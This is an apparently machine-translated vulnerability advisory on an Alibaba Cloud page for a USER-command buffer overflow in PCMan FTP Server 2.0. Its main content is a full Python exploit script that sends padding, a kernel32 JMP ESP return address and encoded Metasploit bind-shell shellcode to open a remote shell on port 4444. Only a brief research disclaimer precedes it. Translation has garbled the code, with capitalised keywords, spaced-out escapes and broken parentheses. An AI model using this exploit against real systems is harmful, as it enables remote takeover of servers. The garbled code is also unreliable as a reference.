PCMan FTP Server 'USER' command Buffer Overflow Vulnerability

Last Update:2014-06-13 Source: Internet

Author: User

Tags signal handler

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

Release date:
Updated on: 2013-07-02

Affected Systems:
PCMan FTP Server 2.0
Description:
--------------------------------------------------------------------------------
Bugtraq id: 60837

The PCMan FTP Server is an FTP Server software.

The implementation of PCMan FTP Server 2.0 has a security vulnerability that allows remote attackers to execute arbitrary code in the context of the affected application.

<* Source: Jacob Holcomb

Link: http://packetstormsecurity.com/files/122173/PCMans-FTP-Server-2.0-Directory-Traversal.html
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
#! /Usr/bin/env python

Import signal
From time import sleep
From socket import *
From sys import exit, exc_info

Def sigHandle (signum, frm): # Signal handler

Print "\ n [!] Cleaning up the exploit... [!] \ N"
Sleep (1)
Exit (0)

Def targServer ():

While True:
Try:
Server = inet_aton (raw_input ("\ n [*] Please enter the IPv4
Address of the PCMan FTP Server: \ n> "))
Server = inet_ntoa (server)
Break
Except t:
Print "\ n [!] Error: Please enter a valid IPv4 address.
[!] \ N"
Sleep (1)
Continue

Return server

Def main ():

Print ("" \ n [*] Title ************************** PCMan FTP Server
V2.0.7 Remote Root Shell Exploit-USER Command
[*] Discovered and Reported ***** June 2013
[*] Discovered/Exploited By ****** Jacob Holcomb/Gimppy, Security Analyst
@ Independent Security Evaluators
[*] Exploit/Advisory ************** http://infosec42.blogspot.com/
[*] Software ********************** PCMan FTP Server v2.0.7 (Listens on
TCP/21)
[*] Tested Commands *************** USER (Other commands were not tested
And may be vulnerable)
[*] CVE ************************** PCMan FTP Server v2.0.7 Buffer
Overflow: Pending """)
Signal. signal (signal. SIGINT, sigHandle) # Setting signal handler
Ctrl + c
Victim = targServer ()
Port = int (21)
Cmd = "USER" # Vulnerable command
JuNk = "\ x42" * 2004
# KERNEL32.dll 7CA58265-JMP ESP
Ret = "\ x65 \ x82 \ xA5 \ x7C"
NOP = "\ x90" * 50

#348 Bytes Bind Shell Port TCP/4444
# Msfpayload windows/shell_bind_tcp EXITFUNC = thread LPORT = 4444 R |
# Msfencode-e x86/shikata_ga_nai-c 1-B "\ x0d \ x0a \ x00 \ xf1" R
Shellcode =
"\ Xdb \ xcc \ xba \ x40 \ xb6 \ x7d \ xba \ xd9 \ x74 \ x24 \ xf4 \ x58 \ x29 \ xc9"
Shellcode + =
"\ Xb1 \ x50 \ x31 \ x50 \ x18 \ x03 \ x50 \ x18 \ x83 \ xe8 \ xbc \ x54 \ x88 \ x46"
Shellcode + =
"\ X56 \ x72 \ x3e \ x5f \ x5f \ x7b \ x3e \ x60 \ xff \ x0f \ xad \ xbb \ xdb \ x84"
Shellcode + =
"\ X6b \ xf8 \ xa8 \ xe7 \ x76 \ x78 \ xaf \ xf8 \ xf2 \ x37 \ xb7 \ x8d \ x5a \ xe8"
Shellcode + =
"\ Xc6 \ x7a \ x2d \ x63 \ xfc \ xf7 \ xaf \ x9d \ xcd \ xc7 \ x29 \ xcd \ xa9 \ x08"
Shellcode + =
"\ X3d \ x09 \ x42 \ xb3 \ x14 \ xb0 \ xb8 \ x38 \ x2d \ x60 \ x1b \ xe9 \ x27"
Shellcode + =
"\ X6d \ xe8 \ xb6 \ xe3 \ x6c \ x04 \ x2e \ x67 \ x62 \ x91 \ x24 \ x28 \ x66 \ x24"
Shellcode + =
"\ Xd0 \ xd4 \ xba \ xad \ xaf \ xb7 \ xe6 \ xad \ xce \ x84 \ xd7 \ x16 \ x74 \ x80"
Shellcode + =
"\ X54 \ x99 \ xfe \ xd6 \ x56 \ x52 \ xcb \ xef \ x31 \ xfb \ x4d \ x98"
Shellcode + =
"\ X3f \ xb5 \ x7f \ xb4 \ x10 \ xb5 \ xa9 \ x22 \ xc2 \ x2f \ x3d \ x98 \ xd6 \ xc7"
Shellcode + =
"\ Xca \ xad \ x24 \ x47 \ x60 \ xad \ x99 \ x1f \ x43 \ xbc \ xe6 \ xdb \ x03 \ xc0"
Shellcode + =
"\ Xc1 \ x43 \ x2a \ xdb \ x88 \ xfa \ xc1 \ x2c \ x57 \ xa8 \ x73 \ x2f \ xa8 \ x82"
Shellcode + =
"\ Xeb \ xf6 \ x5f \ xd6 \ x46 \ x5f \ x9f \ xce \ xcb \ x33 \ x0c \ xbc \ xb8 \ xf0"
Shellcode + =
"\ Xe1 \ x01 \ x6d \ x08 \ xd5 \ xe0 \ xf9 \ xe7 \ x8a \ x8a \ xaa \ x8e \ xd2 \ xc6"
Shellcode + =
"\ X24 \ x35 \ x0e \ x99 \ x73 \ x62 \ xd0 \ x8f \ x11 \ x9d \ x7f \ x65 \ x1a \ x4d"
Shellcode + =
"\ X17 \ x21 \ x49 \ x40 \ x01 \ x7e \ x6e \ x4b \ x82 \ xd4 \ x6f \ xa4 \ x4d \ x32"
Shellcode + =
"\ Xc6 \ xc3 \ xc7 \ xeb \ x27 \ x1d \ x87 \ x47 \ x83 \ xf7 \ xd7 \ xb8 \ xb8 \ x90"
Shellcode + =
"\ Xc0 \ x40 \ x78 \ x19 \ x58 \ x4c \ x52 \ x8f \ x99 \ x62 \ x3c \ x5a \ x02 \ xe5"
Shellcode + =
"\ Xa8 \ xf9 \ xa7 \ x60 \ xcd \ x94 \ x67 \ x2a \ x24 \ xa5 \ x01 \ x2b \ x5c \ x71"
Shellcode + =
"\ X9b \ x56 \ x91 \ xb9 \ x68 \ x3c \ x2f \ x7b \ xa2 \ xbf \ x8d \ x50 \ x2f \ xb2"
Shellcode + =
"\ X6b \ x91 \ xe4 \ x66 \ x20 \ x89 \ x88 \ x86 \ x85 \ x5c \ x92 \ x02 \ xad \ x9f"
Shellcode + =
"\ Xba \ xb6 \ x7a \ x32 \ x12 \ x18 \ xd5 \ xd8 \ x95 \ xcb \ x84 \ x49 \ xc7 \ x14"
Shellcode + =
"\ Xf6 \ x1a \ x4a \ x33 \ xf3 \ x14 \ xc7 \ x3b \ x2d \ xc2 \ x17 \ x3c \ xe6 \ xec"
Shellcode + =
"\ X38 \ x48 \ x5f \ xef \ x3a \ x8b \ x3b \ xf0 \ xeb \ x46 \ x3c \ xde \ x7c \ x88"
Shellcode + = "\ x0c \ x3f \ x1c \ x05 \ x6f \ x16 \ x22 \ x79"

Sploit = Cmd + JuNk + ret + NOP + shellcode
Sploit + = "\ x42" * (2992-len (NOP + shellcode) + "\ r \ n"

Try:
Print "\ n [*] Creating network socket ."
Net_sock = socket (AF_INET, SOCK_STREAM)
Except t:
Print "\ n [!] There was an error creating the network socket.
[!] \ N % s \ n "% exc_info ()
Sleep (1)
Exit (0)

Try:
Print "[*] Connecting to PCMan FTP Server @ % s on port TCP/% d ."
% (Victim, port)
Net_sock.connect (victim, port ))
Except t:
Print "\ n [!] There was an error connecting to % s.
[!] \ N % s \ n "% (victim, exc_info ())
Sleep (1)
Exit (0)

Try:
Print "[*] Attempting to exploit the ftp user command.
[*] Sending 1337 ro0t Sh3ll exploit to % s on TCP port % d.
[*] Payload Length: % d bytes. "" % (victim, port, len (sploit ))
Net_sock.send (sploit)
Sleep (1)
Except t:
Print "\ n [!] There was an error sending the 1337 ro0t Sh3ll
Exploit to % s [!] \ N % s \ n "% (victim, exc_info ())
Sleep (1)
Exit (0)

Try:
Print "[*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed
For code execution!
[*] Closing network socket. Press ctrl + c repeatedly to force exploit
Cleanup. \ n """
Net_sock.close ()
Except t:
Print "\ n [!] There was an error closing the network socket.
[!] \ N % s \ n "% exc_info ()
Sleep (1)
Exit (0)

If _ name _ = "_ main __":
Main ()

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

PCMan
-----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Https://files.secureserver.net/1sMltFOsytirTG

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More